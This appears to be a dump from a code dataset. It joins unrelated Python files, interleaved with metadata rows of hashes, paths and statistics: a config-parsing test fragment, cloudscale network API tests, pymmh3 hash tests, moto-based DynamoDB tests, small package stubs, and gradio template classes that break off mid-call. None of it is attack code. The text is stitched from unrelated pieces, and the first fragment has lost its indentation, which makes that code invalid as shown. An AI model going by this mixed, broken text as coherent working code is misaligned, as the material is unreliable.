self.assertEqual(cfg.get(symbols, 'source', 'bar', 'field'), None)
def test_invalid_conditional(self):
data = ('source:\n foo:\n - field: goat\n - field: panda')
with mock.patch('builtins.open', mock_open(data)), \
self.assertRaises(YamlParseError): # noqa
DefaultConfig('file.yml')
def test_invalid_genus(self):
data = ('goofy:\n foo:\n field: value')
with mock.patch('builtins.open', mock_open(data)), \
self.assertRaises(YamlParseError): # noqa
DefaultConfig('file.yml')
data = ('source:\n foo:\n field: value')
with mock.patch('builtins.open', mock_open(data)):
cfg = DefaultConfig('file.yml')
with self.assertRaises(ValueError):
cfg.get({}, 'goofy', 'foo', 'field')
class TestGetDefaultConfig(TestCase):
def setUp(self):
_get_default_config._reset()
def tearDown(self):
_get_default_config._reset()
def test_normal(self):
with mock.patch('os.path.exists', return_value=False) as mexists:
_get_default_config('foo')
mexists.assert_called_once()
def test_invalid_characters(self):
with mock.patch('os.path.exists', return_value=False) as mexists:
_get_default_config('foo/bar')
_get_default_config('.')
_get_default_config('../foo')
mexists.assert_not_called()
| 41.537879
| 77
| 0.569943
| 627
| 5,483
| 4.881978
| 0.119617
| 0.058804
| 0.170533
| 0.198955
| 0.831428
| 0.827507
| 0.779811
| 0.72656
| 0.673963
| 0.661222
| 0
| 0.001937
| 0.246763
| 5,483
| 131
| 78
| 41.854962
| 0.739225
| 0.001641
| 0
| 0.445545
| 0
| 0
| 0.227381
| 0
| 0
| 0
| 0
| 0
| 0.336634
| 1
| 0.128713
| false
| 0
| 0.029703
| 0.009901
| 0.188119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9981d285091c4025fdaa756f27cc0af9c0c44e52
| 7,383
|
py
|
Python
|
cloudscale/tests/test_network.py
|
resmo/python-cloudscale
|
e194e3f74c4df549e59781861d4a0a1e1abf62fc
|
[
"MIT"
] | 6
|
2019-11-21T15:08:58.000Z
|
2019-12-18T07:46:01.000Z
|
cloudscale/tests/test_network.py
|
resmo/python-cloudscale
|
e194e3f74c4df549e59781861d4a0a1e1abf62fc
|
[
"MIT"
] | 15
|
2019-11-26T19:48:12.000Z
|
2020-05-01T14:52:07.000Z
|
cloudscale/tests/test_network.py
|
resmo/python-cloudscale
|
e194e3f74c4df549e59781861d4a0a1e1abf62fc
|
[
"MIT"
] | null | null | null |
from cloudscale import Cloudscale, CloudscaleApiException, CloudscaleException, CLOUDSCALE_API_ENDPOINT
from cloudscale.cli import cli
import responses
import click
from click.testing import CliRunner
NETWORK_RESP = {
"href": "https://api.cloudscale.ch/v1/networks/2db69ba3-1864-4608-853a-0771b6885a3a",
"uuid": "2db69ba3-1864-4608-853a-0771b6885a3a",
"name": "my-network-name",
"created_at": "2019-05-29T13:18:42.511407Z",
"zone": {
"slug": "lpg1"
},
"mtu": 9000,
"subnets": [
{
"href": "https://api.cloudscale.ch/v1/subnets/33333333-1864-4608-853a-0771b6885a3a",
"uuid": "33333333-1864-4608-853a-0771b6885a3a",
"cidr": "172.16.0.0/24"
}
],
"tags": {}
}
@responses.activate
def test_network_get_all():
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks',
json=[NETWORK_RESP],
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks',
json=[NETWORK_RESP],
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks',
json={},
status=500)
cloudscale = Cloudscale(api_token="token")
networks = cloudscale.network.get_all()
assert networks[0]['name'] == "my-network-name"
assert networks[0]['uuid'] == "2db69ba3-1864-4608-853a-0771b6885a3a"
runner = CliRunner()
result = runner.invoke(cli, [
'network',
'-a',
'token',
'list',
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'network',
'-a',
'token',
'list',
])
assert result.exit_code > 0
@responses.activate
def test_network_get_by_uuid():
uuid = "2db69ba3-1864-4608-853a-0771b6885a3a"
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json=NETWORK_RESP,
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json=NETWORK_RESP,
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json={},
status=500)
cloudscale = Cloudscale(api_token="token")
network = cloudscale.network.get_by_uuid(uuid=uuid)
assert network['name'] == "my-network-name"
assert network['uuid'] == uuid
runner = CliRunner()
result = runner.invoke(cli, [
'network',
'-a', 'token',
'show',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'network',
'-a', 'token',
'show',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_network_delete():
uuid = "2db69ba3-1864-4608-853a-0771b6885a3a"
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json=NETWORK_RESP,
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/unknown',
json=NETWORK_RESP,
status=200)
responses.add(
responses.DELETE,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
status=204)
responses.add(
responses.DELETE,
CLOUDSCALE_API_ENDPOINT + '/networks/unknown',
json={
"detail": "Not found."
},
status=404)
cloudscale = Cloudscale(api_token="token")
network = cloudscale.network.delete(uuid=uuid)
assert network is None
try:
cloudscale = Cloudscale(api_token="token")
cloudscale.network.delete(uuid="unknown")
except CloudscaleApiException as e:
assert e.status_code == 404
runner = CliRunner()
result = runner.invoke(cli, [
'network',
'-a', 'token',
'delete',
uuid,
])
assert result.exit_code == 1
runner = CliRunner()
result = runner.invoke(cli, [
'network',
'-a', 'token',
'delete',
uuid,
'--force',
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'network',
'-a', 'token',
'delete',
'--force',
'unknown',
])
assert result.exit_code > 0
@responses.activate
def test_network_create():
name = "my-network-name"
responses.add(
responses.POST,
CLOUDSCALE_API_ENDPOINT + '/networks',
json=NETWORK_RESP,
status=201)
responses.add(
responses.POST,
CLOUDSCALE_API_ENDPOINT + '/networks',
json=NETWORK_RESP,
status=201)
responses.add(
responses.POST,
CLOUDSCALE_API_ENDPOINT + '/networks',
json={},
status=500)
cloudscale = Cloudscale(api_token="token")
cloudscale.network.create(
name=name,
)
runner = CliRunner()
result = runner.invoke(cli, [
'network',
'-a', 'token',
'create',
'--name',
name,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'network',
'-a', 'token',
'create',
'--name',
name,
])
assert result.exit_code > 0
@responses.activate
def test_network_update():
uuid = "2db69ba3-1864-4608-853a-0771b6885a3a"
name = "my-network-name"
responses.add(
responses.PATCH,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json=NETWORK_RESP,
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json=NETWORK_RESP,
status=200)
responses.add(
responses.PATCH,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json=NETWORK_RESP,
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json=NETWORK_RESP,
status=200)
responses.add(
responses.PATCH,
CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
json={},
status=500)
cloudscale = Cloudscale(api_token="token")
network = cloudscale.network.update(uuid=uuid, name=name)
assert network['name'] == name
assert network['uuid'] == uuid
runner = CliRunner()
result = runner.invoke(cli, [
'network',
'-a', 'token',
'update',
uuid,
'--name',
name,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'network',
'-a', 'token',
'update',
uuid,
'--name',
name,
])
assert result.exit_code > 0
@responses.activate
def test_network_get_by_uuid_not_found():
responses.add(
responses.GET,
CLOUDSCALE_API_ENDPOINT + '/networks/unknown',
json={
"detail": "Not found."
},
status=404)
try:
cloudscale = Cloudscale(api_token="token")
cloudscale.network.get_by_uuid(uuid="unknown")
except CloudscaleApiException as e:
assert e.status_code == 404
assert str(e) == "API Response Error (404): Not found."
assert e.response == {'data': {'detail': 'Not found.'}, 'status_code': 404}
def test_network_missing_api_key():
runner = CliRunner()
result = runner.invoke(cli, [
'network',
'list',
])
assert result.exit_code == 1
| 25.546713
| 103
| 0.574834
| 753
| 7,383
| 5.498008
| 0.126162
| 0.084783
| 0.101449
| 0.133092
| 0.85628
| 0.809179
| 0.774396
| 0.755797
| 0.690097
| 0.68285
| 0
| 0.060959
| 0.29121
| 7,383
| 288
| 104
| 25.635417
| 0.730174
| 0
| 0
| 0.816479
| 0
| 0.007491
| 0.160233
| 0.032913
| 0
| 0
| 0
| 0
| 0.086142
| 1
| 0.026217
| false
| 0
| 0.018727
| 0
| 0.044944
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
41d2e889efa00b5f81c93aec7018cff96467f801
| 24
|
py
|
Python
|
world/elastica/__init__.py
|
mbed92/rl-physnet
|
62b6e8a84a6704a50855434933a147f507f94263
|
[
"MIT"
] | 1
|
2021-07-02T13:33:49.000Z
|
2021-07-02T13:33:49.000Z
|
world/elastica/__init__.py
|
mbed92/dao-perception
|
62b6e8a84a6704a50855434933a147f507f94263
|
[
"MIT"
] | 3
|
2021-09-01T16:16:42.000Z
|
2021-09-10T11:18:59.000Z
|
world/elastica/__init__.py
|
mbed92/dao-perception
|
62b6e8a84a6704a50855434933a147f507f94263
|
[
"MIT"
] | 1
|
2021-08-30T08:26:21.000Z
|
2021-08-30T08:26:21.000Z
|
from . import generator
| 12
| 23
| 0.791667
| 3
| 24
| 6.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5112831419a33e28088906eb8f5f3bde1b8f77ec
| 55
|
py
|
Python
|
djangoproject/pages/namer.py
|
standridgejeff/PersonalWebsite
|
c4f67677d684ca11c6f61958f4df315823790a4f
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
djangoproject/pages/namer.py
|
standridgejeff/PersonalWebsite
|
c4f67677d684ca11c6f61958f4df315823790a4f
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
djangoproject/pages/namer.py
|
standridgejeff/PersonalWebsite
|
c4f67677d684ca11c6f61958f4df315823790a4f
|
[
"bzip2-1.0.6",
"MIT"
] | null | null | null |
def namer():
return "My Name is still Jeff Standridge"
| 27.5
| 42
| 0.745455
| 9
| 55
| 4.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163636
| 55
| 2
| 42
| 27.5
| 0.891304
| 0
| 0
| 0
| 0
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
51293fd6c377653cd5a80ed456b5f916c32a92dc
| 42
|
py
|
Python
|
examples/secret/secret.py
|
satoshi03/build_tools
|
bfc9af9c0dcb17a04abd87304bc234e447bea497
|
[
"MIT"
] | null | null | null |
examples/secret/secret.py
|
satoshi03/build_tools
|
bfc9af9c0dcb17a04abd87304bc234e447bea497
|
[
"MIT"
] | null | null | null |
examples/secret/secret.py
|
satoshi03/build_tools
|
bfc9af9c0dcb17a04abd87304bc234e447bea497
|
[
"MIT"
] | null | null | null |
def secret():
print("This is secret")
| 14
| 27
| 0.619048
| 6
| 42
| 4.333333
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 42
| 2
| 28
| 21
| 0.787879
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5abcbf6681489b21ac281f95dd348173daca40b7
| 46
|
py
|
Python
|
ventilatormodels/simple_regressor/__init__.py
|
trevorWieland/kaggle-ventilator-model
|
06931f63c266b5b8e94124606f1ca63936a5cfc7
|
[
"MIT"
] | null | null | null |
ventilatormodels/simple_regressor/__init__.py
|
trevorWieland/kaggle-ventilator-model
|
06931f63c266b5b8e94124606f1ca63936a5cfc7
|
[
"MIT"
] | null | null | null |
ventilatormodels/simple_regressor/__init__.py
|
trevorWieland/kaggle-ventilator-model
|
06931f63c266b5b8e94124606f1ca63936a5cfc7
|
[
"MIT"
] | null | null | null |
from .simple_regressor import SimpleRegressor
| 23
| 45
| 0.891304
| 5
| 46
| 8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 46
| 1
| 46
| 46
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5ad644287dc5486c8f56f3950ef25fd87286b222
| 81
|
py
|
Python
|
juliaset/__init__.py
|
PageotD/juliaset
|
7c1f98020eeff291fcf040cfcdf25a89e72f46a9
|
[
"BSD-3-Clause"
] | null | null | null |
juliaset/__init__.py
|
PageotD/juliaset
|
7c1f98020eeff291fcf040cfcdf25a89e72f46a9
|
[
"BSD-3-Clause"
] | null | null | null |
juliaset/__init__.py
|
PageotD/juliaset
|
7c1f98020eeff291fcf040cfcdf25a89e72f46a9
|
[
"BSD-3-Clause"
] | 1
|
2021-08-09T06:45:43.000Z
|
2021-08-09T06:45:43.000Z
|
from .juliaset import julia
from .juliaset import JuliaSet
__version__ = "0.3.0"
| 20.25
| 30
| 0.777778
| 12
| 81
| 4.916667
| 0.583333
| 0.40678
| 0.610169
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042857
| 0.135802
| 81
| 4
| 31
| 20.25
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.060976
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5ae399b0913fd76445b2d85bd467819305703cee
| 6,231
|
py
|
Python
|
test/pymmh3_test.py
|
aahmed-se/pymmh3
|
c18b0ffed586b4cb158a9aa4832d5a4603db19a4
|
[
"CC0-1.0"
] | 1
|
2019-05-23T21:37:35.000Z
|
2019-05-23T21:37:35.000Z
|
test/pymmh3_test.py
|
aahmed-se/pymmh3
|
c18b0ffed586b4cb158a9aa4832d5a4603db19a4
|
[
"CC0-1.0"
] | null | null | null |
test/pymmh3_test.py
|
aahmed-se/pymmh3
|
c18b0ffed586b4cb158a9aa4832d5a4603db19a4
|
[
"CC0-1.0"
] | null | null | null |
# pymmh3 was written by Fredrik Kihlander and enhanced by Swapnil Gusani, and is placed in the public
# domain. The authors hereby disclaim copyright to this source code.
import os
import sys
import unittest
file_dir = os.path.dirname( __file__ )
sys.path.append( os.path.join( file_dir, '..' ) )
import pymmh3
class Testpymmh3( unittest.TestCase ):
def _load_solutions(self, solution_file, base = 16):
solution = {}
with open( os.path.join( file_dir, solution_file ), 'rb' ) as f:
while True:
l = f.readline()
if not l:
break
solution[ l ] = int( f.readline(), base )
return solution
def test_32bit_basic_string( self ):
solution = self._load_solutions('solution_hash32_seed0.txt', 10)
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash( l )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_32bit_basic_bytearray( self ):
solution = self._load_solutions('solution_hash32_seed0.txt', 10)
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash( bytearray( l ) )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_32bit_custom_seed_string( self ):
solution = self._load_solutions('solution_hash32_seed1234ABCD.txt', 10)
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash( l, seed = 0x1234ABCD )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_32bit_custom_seed_bytearray( self ):
solution = self._load_solutions('solution_hash32_seed1234ABCD.txt', 10)
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash( bytearray( l ), seed = 0x1234ABCD )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x86_basic_string( self ):
solution = self._load_solutions('solution_hash128_x86_seed0.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( l , x64arch = False )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x86_basic_bytearray( self ):
solution = self._load_solutions('solution_hash128_x86_seed0.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( bytearray( l ), x64arch = False )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x86_custom_seed_string( self ):
solution = self._load_solutions('solution_hash128_x86_seed1234ABCD.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( l, seed = 0x1234ABCD, x64arch = False )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x86_custom_seed_bytearray( self ):
solution = self._load_solutions('solution_hash128_x86_seed1234ABCD.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( bytearray( l ), seed = 0x1234ABCD, x64arch = False )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x64_basic_string( self ):
solution = self._load_solutions('solution_hash128_x64_seed0.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( l, x64arch = True )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x64_basic_bytearray( self ):
solution = self._load_solutions('solution_hash128_x64_seed0.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( bytearray( l ), x64arch = True )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x64_custom_seed_string( self ):
solution = self._load_solutions('solution_hash128_x64_seed1234ABCD.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( l, seed = 0x1234ABCD, x64arch = True )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
def test_128bit_x64_custom_seed_bytearray( self ):
solution = self._load_solutions('solution_hash128_x64_seed1234ABCD.txt')
with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
for l in test_file.readlines():
s = solution[l]
r = pymmh3.hash128( bytearray( l ), seed = 0x1234ABCD, x64arch = True )
self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )
if __name__ == "__main__":
unittest.main()
| 46.155556
| 105
| 0.581769
| 828
| 6,231
| 4.183575
| 0.109903
| 0.055427
| 0.040416
| 0.056582
| 0.880485
| 0.875577
| 0.875577
| 0.86836
| 0.861143
| 0.848152
| 0
| 0.077307
| 0.292088
| 6,231
| 134
| 106
| 46.5
| 0.708003
| 0.026641
| 0
| 0.588235
| 0
| 0
| 0.181788
| 0.063016
| 0
| 0
| 0.009898
| 0
| 0.117647
| 1
| 0.127451
| false
| 0
| 0.039216
| 0
| 0.186275
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
850480da8610989506b9236c2ad17454f1e3e7f7
| 5,577
|
py
|
Python
|
tests/test_dynamodb.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | 2
|
2022-01-26T15:05:48.000Z
|
2022-01-31T17:28:47.000Z
|
tests/test_dynamodb.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | 10
|
2021-08-03T21:23:39.000Z
|
2022-02-10T15:24:12.000Z
|
tests/test_dynamodb.py
|
MITLibraries/wiley-deposits
|
33659d760d9e39ca0aef0098e726132b5e2205de
|
[
"Apache-2.0"
] | null | null | null |
from moto import mock_dynamodb2
from awd.cli import Status
@mock_dynamodb2
def test_dynamodb_add_doi_item_to_database(dynamodb_class):
dynamodb_class.client.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb_class.client.describe_table(TableName="test_dois")
add_response = dynamodb_class.add_doi_item_to_database("test_dois", "222.2/2222")
assert add_response["ResponseMetadata"]["HTTPStatusCode"] == 200
@mock_dynamodb2
def test_dynamodb_retrieve_doi_items_from_database(dynamodb_class):
dynamodb_class.client.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb_class.client.put_item(
TableName="test_dois",
Item={
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
"attempts": {"S": "1"},
},
)
dois = dynamodb_class.retrieve_doi_items_from_database("test_dois")
assert dois == [
{
"doi": "111.1/1111",
"status": "Failed, will retry",
"attempts": "1",
}
]
@mock_dynamodb2
def test_dynamodb_retry_threshold_exceeded_false(dynamodb_class):
dynamodb_class.client.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb_class.client.put_item(
TableName="test_dois",
Item={
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
"attempts": {"S": "1"},
},
)
validation_status = dynamodb_class.retry_attempts_exceeded(
"test_dois", "111.1/1111", "10"
)
assert validation_status is False
@mock_dynamodb2
def test_dynamodb_retry_threshold_exceeded_true(dynamodb_class):
dynamodb_class.client.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb_class.client.put_item(
TableName="test_dois",
Item={
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
"attempts": {"S": "10"},
},
)
validation_status = dynamodb_class.retry_attempts_exceeded(
"test_dois", "111.1/1111", "10"
)
assert validation_status is True
@mock_dynamodb2
def test_dynamodb_update_doi_item_attempts_in_database(dynamodb_class):
dynamodb_class.client.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb_class.client.put_item(
TableName="test_dois",
Item={
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
"attempts": {"S": "1"},
},
)
existing_item = dynamodb_class.client.get_item(
TableName="test_dois",
Key={"doi": {"S": "111.1/1111"}},
)
assert existing_item["Item"] == {
"attempts": {"S": "1"},
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
}
update_response = dynamodb_class.update_doi_item_attempts_in_database(
"test_dois", "111.1/1111"
)
assert update_response["ResponseMetadata"]["HTTPStatusCode"] == 200
updated_item = dynamodb_class.client.get_item(
TableName="test_dois",
Key={"doi": {"S": "111.1/1111"}},
)
assert updated_item["Item"] == {
"attempts": {"S": "2"},
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
}
@mock_dynamodb2
def test_dynamodb_update_doi_item_status_in_database(dynamodb_class):
dynamodb_class.client.create_table(
TableName="test_dois",
KeySchema=[
{"AttributeName": "doi", "KeyType": "HASH"},
],
AttributeDefinitions=[
{"AttributeName": "doi", "AttributeType": "S"},
],
)
dynamodb_class.client.put_item(
TableName="test_dois",
Item={
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
"attempts": {"S": "1"},
},
)
existing_item = dynamodb_class.client.get_item(
TableName="test_dois",
Key={"doi": {"S": "111.1/1111"}},
)
assert existing_item["Item"] == {
"attempts": {"S": "1"},
"doi": {"S": "111.1/1111"},
"status": {"S": "Failed, will retry"},
}
update_response = dynamodb_class.update_doi_item_status_in_database(
"test_dois", "111.1/1111", Status.PROCESSING.value
)
assert update_response["ResponseMetadata"]["HTTPStatusCode"] == 200
updated_item = dynamodb_class.client.get_item(
TableName="test_dois",
Key={"doi": {"S": "111.1/1111"}},
)
assert updated_item["Item"] == {
"attempts": {"S": "1"},
"doi": {"S": "111.1/1111"},
"status": {"S": "1"},
}
| 30.145946
| 85
| 0.558365
| 561
| 5,577
| 5.285205
| 0.112299
| 0.122766
| 0.048567
| 0.035076
| 0.902867
| 0.856998
| 0.847555
| 0.830017
| 0.768634
| 0.768634
| 0
| 0.04541
| 0.273445
| 5,577
| 184
| 86
| 30.309783
| 0.686328
| 0
| 0
| 0.672515
| 0
| 0
| 0.220011
| 0
| 0
| 0
| 0
| 0
| 0.05848
| 1
| 0.035088
| false
| 0
| 0.011696
| 0
| 0.046784
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
516ea2e5ef44ee329def0126d9de891c000790a8
| 3,289
|
py
|
Python
|
gradio/templates.py
|
dumpmemory/gradio
|
748b1a4761c7f32e231c831a651595f5a33db039
|
[
"Apache-2.0"
] | 1
|
2021-12-15T09:21:44.000Z
|
2021-12-15T09:21:44.000Z
|
gradio/templates.py
|
AK391/gradio
|
f3fa61cce8b0eab4f76c564216cda3108824020a
|
[
"Apache-2.0"
] | null | null | null |
gradio/templates.py
|
AK391/gradio
|
f3fa61cce8b0eab4f76c564216cda3108824020a
|
[
"Apache-2.0"
] | null | null | null |
from gradio import components
class Text(components.Textbox):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(lines=1, **kwargs)
class TextArea(components.Textbox):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(lines=7, **kwargs)
class Webcam(components.Image):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(source="webcam", **kwargs)
class Sketchpad(components.Image):
def __init__(self, **kwargs):
"""
Custom component
@param kwargs:
"""
self.is_template = True
super().__init__(
image_mode="L",
